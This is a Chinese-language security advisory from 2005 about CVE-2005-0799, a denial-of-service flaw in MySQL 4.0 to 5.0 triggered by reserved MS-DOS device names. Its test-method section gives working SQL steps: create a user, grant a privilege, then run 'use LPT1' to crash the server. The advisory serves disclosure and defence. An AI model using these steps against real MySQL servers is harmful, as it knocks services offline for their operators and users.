发布日期：2005-03-16
更新日期：2005-03-16

受影响系统：

MySQL AB MySQL 5.0.XX
MySQL AB MySQL 4.1.XX
MySQL AB MySQL 4.0.XX

描述：

---

CVE(CAN) ID: CVE-2005-0799

MySQL是多用户，多线程的关系数据库管理系统。MySQL数据库服务器是世界上最流行的开放源码数据库之一。

MySQL Server处理包含有保留MS-DOS设备名（AUX，CON，COM1，LPT1和PRN）请求的方式存在漏洞，远程攻击者可能利用此漏洞对主机进行拒绝服务攻击。

攻击者要利用此漏洞必须通过认证并至少具有以下权限之一：

- REFERENCES
- CREATE TEMPORARY TABLES
- GRANT OPTION
- CREATE
- SELECT

这样可以导致服务失败。

<*来源：Luca Ercoli （luca.ercoli@inwind.it）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=111091250923281&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

1- 创建一个用户帐号：

(connected as 'root')

use mysql;
INSERT INTO user (Host,User,Password) VALUES('%','customer',PASSWORD('customer'));

2- 给予用户上文所述的一个或多个权限：

(connected as 'root')

GRANT CREATE TEMPORARY TABLES ON *.* TO 'customer'@'%';
flush privileges;

3- 使用新帐号连接到服务器并“use”数据库“LPT1”。

(connected as 'customer')
use LPT1;

建议：

---

厂商补丁：

MySQL AB
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.mysql.com/

浏览次数：3435
严重程度：0（网友投票）